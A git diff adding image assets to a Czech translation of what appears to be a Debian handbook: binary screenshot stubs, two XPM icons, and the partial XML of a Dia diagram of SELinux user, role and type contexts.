Binary files /dev/null and b/tmp/cs-CZ/xml/images/gnome-packagekit.png differ
diff --git a/tmp/cs-CZ/xml/images/gnome.png b/tmp/cs-CZ/xml/images/gnome.png
new file mode 100644
index 000000000..e3e7b5d28
Binary files /dev/null and b/tmp/cs-CZ/xml/images/gnome.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-autopartman-mode.png b/tmp/cs-CZ/xml/images/inst-autopartman-mode.png
new file mode 100644
index 000000000..8788e2c87
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-autopartman-mode.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-basesystem.png b/tmp/cs-CZ/xml/images/inst-basesystem.png
new file mode 100644
index 000000000..014d710e2
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-basesystem.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-boot.png b/tmp/cs-CZ/xml/images/inst-boot.png
new file mode 100644
index 000000000..3b922b4b7
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-boot.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-country-txt.png b/tmp/cs-CZ/xml/images/inst-country-txt.png
new file mode 100644
index 000000000..8cb6ad679
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-country-txt.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-country.png b/tmp/cs-CZ/xml/images/inst-country.png
new file mode 100644
index 000000000..6bb0bdc4f
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-country.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-gdm.png b/tmp/cs-CZ/xml/images/inst-gdm.png
new file mode 100644
index 000000000..98b7e2cf8
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-gdm.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-keyboard-txt.png b/tmp/cs-CZ/xml/images/inst-keyboard-txt.png
new file mode 100644
index 000000000..0ac1950aa
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-keyboard-txt.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-keyboard.png b/tmp/cs-CZ/xml/images/inst-keyboard.png
new file mode 100644
index 000000000..1f922e3d9
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-keyboard.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-lang-txt.png b/tmp/cs-CZ/xml/images/inst-lang-txt.png
new file mode 100644
index 000000000..12d0b4694
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-lang-txt.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-lang.png b/tmp/cs-CZ/xml/images/inst-lang.png
new file mode 100644
index 000000000..8c67ffd00
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-lang.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-mirror.png b/tmp/cs-CZ/xml/images/inst-mirror.png
new file mode 100644
index 000000000..d39450079
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-mirror.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-partman-disk.png b/tmp/cs-CZ/xml/images/inst-partman-disk.png
new file mode 100644
index 000000000..2faa8d909
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-partman-disk.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-partman-validation.png b/tmp/cs-CZ/xml/images/inst-partman-validation.png
new file mode 100644
index 000000000..e920eb871
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-partman-validation.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-partman.png b/tmp/cs-CZ/xml/images/inst-partman.png
new file mode 100644
index 000000000..94bb1096c
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-partman.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-rootpw.png b/tmp/cs-CZ/xml/images/inst-rootpw.png
new file mode 100644
index 000000000..06c86d8f1
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-rootpw.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-tasksel.png b/tmp/cs-CZ/xml/images/inst-tasksel.png
new file mode 100644
index 000000000..9bbb0f763
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-tasksel.png differ
diff --git a/tmp/cs-CZ/xml/images/inst-username.png b/tmp/cs-CZ/xml/images/inst-username.png
new file mode 100644
index 000000000..a350d2758
Binary files /dev/null and b/tmp/cs-CZ/xml/images/inst-username.png differ
diff --git a/tmp/cs-CZ/xml/images/kde.png b/tmp/cs-CZ/xml/images/kde.png
new file mode 100644
index 000000000..ccf0c6a49
Binary files /dev/null and b/tmp/cs-CZ/xml/images/kde.png differ
diff --git a/tmp/cs-CZ/xml/images/kmail.png b/tmp/cs-CZ/xml/images/kmail.png
new file mode 100644
index 000000000..27c816f0c
Binary files /dev/null and b/tmp/cs-CZ/xml/images/kmail.png differ
diff --git a/tmp/cs-CZ/xml/images/mail-server.dia b/tmp/cs-CZ/xml/images/mail-server.dia
new file mode 100644
index 000000000..166141696
Binary files /dev/null and b/tmp/cs-CZ/xml/images/mail-server.dia differ
diff --git a/tmp/cs-CZ/xml/images/mail-server.png b/tmp/cs-CZ/xml/images/mail-server.png
new file mode 100644
index 000000000..d97ec10d8
Binary files /dev/null and b/tmp/cs-CZ/xml/images/mail-server.png differ
diff --git a/tmp/cs-CZ/xml/images/microsoft-windows-logo-2.gif b/tmp/cs-CZ/xml/images/microsoft-windows-logo-2.gif
new file mode 100644
index 000000000..c0ccf4272
Binary files /dev/null and b/tmp/cs-CZ/xml/images/microsoft-windows-logo-2.gif differ
diff --git a/tmp/cs-CZ/xml/images/netfilter.dia b/tmp/cs-CZ/xml/images/netfilter.dia
new file mode 100644
index 000000000..8bd74c414
Binary files /dev/null and b/tmp/cs-CZ/xml/images/netfilter.dia differ
diff --git a/tmp/cs-CZ/xml/images/netfilter.png b/tmp/cs-CZ/xml/images/netfilter.png
new file mode 100644
index 000000000..e69ca9b05
Binary files /dev/null and b/tmp/cs-CZ/xml/images/netfilter.png differ
diff --git a/tmp/cs-CZ/xml/images/next.xpm b/tmp/cs-CZ/xml/images/next.xpm
new file mode 100644
index 000000000..138389be5
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/next.xpm
@@ -0,0 +1,36 @@
+/* XPM */
+static char * next_xpm[] = {
+"28 24 9 1",
+" 	c #c3c3c3",
+".	c #828282",
+"X	c #000000",
+"o	c #ffff9e",
+"O	c #ffbe5d",
+"+	c #ffbe7d",
+"@	c #ff0000",
+"#	c #00ff00",
+"$	c #3c9e3c",
+"                .XXX        ",
+"             .XXXXXX.       ",
+"          .XXXXXoooXX       ",
+"       .XXXOXXXoXXoXX.      ",
+"    .XXXXXXXOXXoooXXXX      ",
+"    .X+OOXXXOXXoXXXoXX.     ",
+"    X.X+X+OOXOXXoooXXXX     ",
+"    X.XXOXXXOOOXXXXX@@@.    ",
+"    XX.X+XXXXX+XX@@@XXXX    ",
+"   .XX.XX+XXXXX#@XXX@XXX.   ",
+"   XXXX.X$#XXX#$XXXX@XXXX   ",
+"   XXXX.XX$#$$#XXXXXX@XXX.  ",
+"   XXXXX.XXXX#$#XXXXX@XXX.  ",
+"   XXXXX.XXXX#$X$#$XXXX.    ",
+"   .XXXXX.XX#$XXXXXX. .XX.  ",
+"    XXXXX.XX#XXXX. .XXXXX   ",
+"    .XXXXX.XXX. .XXXXXXXX   ",
+"     XXXXX.X..XXXXXXXXXXX   ",
+"     .XXXXX.XXXXXXXXXXXX.   ",
+"      XXXXX XXXXXXXXXXXX    ",
+"      .XXXX.XXXXXXXXXXXX    ",
+"       XXX.XXXXXXXXXX.      ",
+"       .XX XXXXXXX.         ",
+"        XX XXXX.            "};
diff --git a/tmp/cs-CZ/xml/images/openlogo-nd.png b/tmp/cs-CZ/xml/images/openlogo-nd.png
new file mode 100644
index 000000000..989f050a7
Binary files /dev/null and b/tmp/cs-CZ/xml/images/openlogo-nd.png differ
diff --git a/tmp/cs-CZ/xml/images/package-lifecycle.dia b/tmp/cs-CZ/xml/images/package-lifecycle.dia
new file mode 100644
index 000000000..6352dffa6
Binary files /dev/null and b/tmp/cs-CZ/xml/images/package-lifecycle.dia differ
diff --git a/tmp/cs-CZ/xml/images/package-lifecycle.png b/tmp/cs-CZ/xml/images/package-lifecycle.png
new file mode 100644
index 000000000..c72229fe6
Binary files /dev/null and b/tmp/cs-CZ/xml/images/package-lifecycle.png differ
diff --git a/tmp/cs-CZ/xml/images/package.png b/tmp/cs-CZ/xml/images/package.png
new file mode 100644
index 000000000..184e920c1
Binary files /dev/null and b/tmp/cs-CZ/xml/images/package.png differ
diff --git a/tmp/cs-CZ/xml/images/redhat.xpm b/tmp/cs-CZ/xml/images/redhat.xpm
new file mode 100644
index 000000000..8a37a83da
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/redhat.xpm
@@ -0,0 +1,29 @@
+/* XPM */
+static char *redhat_xpm[] = {
+"28 24 2 1",
+" 	c #ff9ebe",
+".	c #ff0000",
+"                            ",
+"                            ",
+"       ...        ...       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+"       ..............       ",
+" ..    ..............    .. ",
+" ...   ..............   ... ",
+"  ........................  ",
+"   ......................   ",
+"     ..................     ",
+"        ............        ",
+"                            "};
diff --git a/tmp/cs-CZ/xml/images/release-cycle.dia b/tmp/cs-CZ/xml/images/release-cycle.dia
new file mode 100644
index 000000000..6d5a73936
Binary files /dev/null and b/tmp/cs-CZ/xml/images/release-cycle.dia differ
diff --git a/tmp/cs-CZ/xml/images/release-cycle.png b/tmp/cs-CZ/xml/images/release-cycle.png
new file mode 100644
index 000000000..7cf307a5e
Binary files /dev/null and b/tmp/cs-CZ/xml/images/release-cycle.png differ
diff --git a/tmp/cs-CZ/xml/images/selinux-context.dia b/tmp/cs-CZ/xml/images/selinux-context.dia
new file mode 100644
index 000000000..a93ef532a
--- /dev/null
+++ b/tmp/cs-CZ/xml/images/selinux-context.dia
@@ -0,0 +1,1006 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<dia:diagram xmlns:dia="http://www.lysator.liu.se/~alla/dia/">
+  <dia:diagramdata>
+    <dia:attribute name="background">
+      <dia:color val="#ffffff"/>
+    </dia:attribute>
+    <dia:attribute name="pagebreak">
+      <dia:color val="#000099"/>
+    </dia:attribute>
+    <dia:attribute name="paper">
+      <dia:composite type="paper">
+        <dia:attribute name="name">
+          <dia:string>#A4#</dia:string>
+        </dia:attribute>
+        <dia:attribute name="tmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="bmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="lmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="rmargin">
+          <dia:real val="2.8222000598907471"/>
+        </dia:attribute>
+        <dia:attribute name="is_portrait">
+          <dia:boolean val="true"/>
+        </dia:attribute>
+        <dia:attribute name="scaling">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="fitto">
+          <dia:boolean val="false"/>
+        </dia:attribute>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="grid">
+      <dia:composite type="grid">
+        <dia:attribute name="width_x">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="width_y">
+          <dia:real val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_x">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:attribute name="visible_y">
+          <dia:int val="1"/>
+        </dia:attribute>
+        <dia:composite type="color"/>
+      </dia:composite>
+    </dia:attribute>
+    <dia:attribute name="color">
+      <dia:color val="#d8e5e5"/>
+    </dia:attribute>
+    <dia:attribute name="guides">
+      <dia:composite type="guides">
+        <dia:attribute name="hguides"/>
+        <dia:attribute name="vguides"/>
+      </dia:composite>
+    </dia:attribute>
+  </dia:diagramdata>
+  <dia:layer name="Arrière-plan" visible="true" active="true">
+    <dia:object type="Flowchart - Box" version="0" id="O0">
+      <dia:attribute name="obj_pos">
+        <dia:point val="5.3,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="5.25,3.015;7.75,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="5.3,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="2.3999999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#root#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O1">
+      <dia:attribute name="obj_pos">
+        <dia:point val="9.9,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="9.85,3.015;13.65,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="9.9,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#hertzog#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="11.75,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O2">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.115,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.065,7.285;15.385,9.285"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.115,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.2200000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_u#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,8.48"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O3">
+      <dia:attribute name="obj_pos">
+        <dia:point val="5.3,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="5.25,7.285;7.75,9.285"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="5.3,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="2.3999999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#root#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,8.48"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O4">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.1862,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.1362,11.555;15.3138,13.555"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.1862,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.0775000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_r#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,12.75"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O5">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.425,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="4.375,11.555;8.625,13.555"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="4.425,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="4.1499999999999995"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000004"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#sysadm_r#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,12.75"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O6">
+      <dia:attribute name="obj_pos">
+        <dia:point val="4.43125,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="4.38125,15.825;8.61875,17.825"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="4.43125,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="4.1375000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#sysadm_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="6.5,17.02"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O7">
+      <dia:attribute name="obj_pos">
+        <dia:point val="12.1925,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="12.1425,15.825;15.3075,17.825"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="12.1925,15.875"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.0649999999999999"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#user_t#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="13.725,17.02"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Flowchart - Box" version="0" id="O8">
+      <dia:attribute name="obj_pos">
+        <dia:point val="14.525,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="14.475,3.015;18.275,5.015"/>
+      </dia:attribute>
+      <dia:attribute name="elem_corner">
+        <dia:point val="14.525,3.065"/>
+      </dia:attribute>
+      <dia:attribute name="elem_width">
+        <dia:real val="3.7000000000000002"/>
+      </dia:attribute>
+      <dia:attribute name="elem_height">
+        <dia:real val="1.9000000000000001"/>
+      </dia:attribute>
+      <dia:attribute name="show_background">
+        <dia:boolean val="true"/>
+      </dia:attribute>
+      <dia:attribute name="padding">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="text">
+        <dia:composite type="text">
+          <dia:attribute name="string">
+            <dia:string>#lolando#</dia:string>
+          </dia:attribute>
+          <dia:attribute name="font">
+            <dia:font family="sans" style="0" name="Helvetica"/>
+          </dia:attribute>
+          <dia:attribute name="height">
+            <dia:real val="0.80000000000000004"/>
+          </dia:attribute>
+          <dia:attribute name="pos">
+            <dia:point val="16.375,4.21"/>
+          </dia:attribute>
+          <dia:attribute name="color">
+            <dia:color val="#000000"/>
+          </dia:attribute>
+          <dia:attribute name="alignment">
+            <dia:enum val="1"/>
+          </dia:attribute>
+        </dia:composite>
+      </dia:attribute>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O9">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,5.0144"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,4.9644;6.8618,7.4468"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,5.0144"/>
+        <dia:point val="6.5,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O0" connection="16"/>
+        <dia:connection handle="1" to="O3" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O10">
+      <dia:attribute name="obj_pos">
+        <dia:point val="11.75,4.965"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="11.683,4.89799;12.9969,7.43517"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="11.75,4.965"/>
+        <dia:point val="12.925,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O1" connection="13"/>
+        <dia:connection handle="1" to="O2" connection="1"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O11">
+      <dia:attribute name="obj_pos">
+        <dia:point val="16.375,4.965"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="14.4548,4.89482;16.4452,7.42313"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="16.375,4.965"/>
+        <dia:point val="14.525,7.335"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O8" connection="13"/>
+        <dia:connection handle="1" to="O2" connection="3"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O12">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.1382,9.185;6.8618,11.7168"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,9.235"/>
+        <dia:point val="6.5,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O3" connection="13"/>
+        <dia:connection handle="1" to="O5" connection="2"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O13">
+      <dia:attribute name="obj_pos">
+        <dia:point val="6.5,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="6.43464,9.16964;12.3032,11.7144"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="6.5,9.235"/>
+        <dia:point val="12.2,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
+        <dia:enum val="22"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_length">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow_width">
+        <dia:real val="0.5"/>
+      </dia:attribute>
+      <dia:connections>
+        <dia:connection handle="0" to="O3" connection="13"/>
+        <dia:connection handle="1" to="O4" connection="0"/>
+      </dia:connections>
+    </dia:object>
+    <dia:object type="Standard - Line" version="0" id="O14">
+      <dia:attribute name="obj_pos">
+        <dia:point val="13.725,9.235"/>
+      </dia:attribute>
+      <dia:attribute name="obj_bb">
+        <dia:rectangle val="13.3632,9.185;14.0868,11.7168"/>
+      </dia:attribute>
+      <dia:attribute name="conn_endpoints">
+        <dia:point val="13.725,9.235"/>
+        <dia:point val="13.725,11.605"/>
+      </dia:attribute>
+      <dia:attribute name="numcp">
+        <dia:int val="1"/>
+      </dia:attribute>
+      <dia:attribute name="end_arrow">
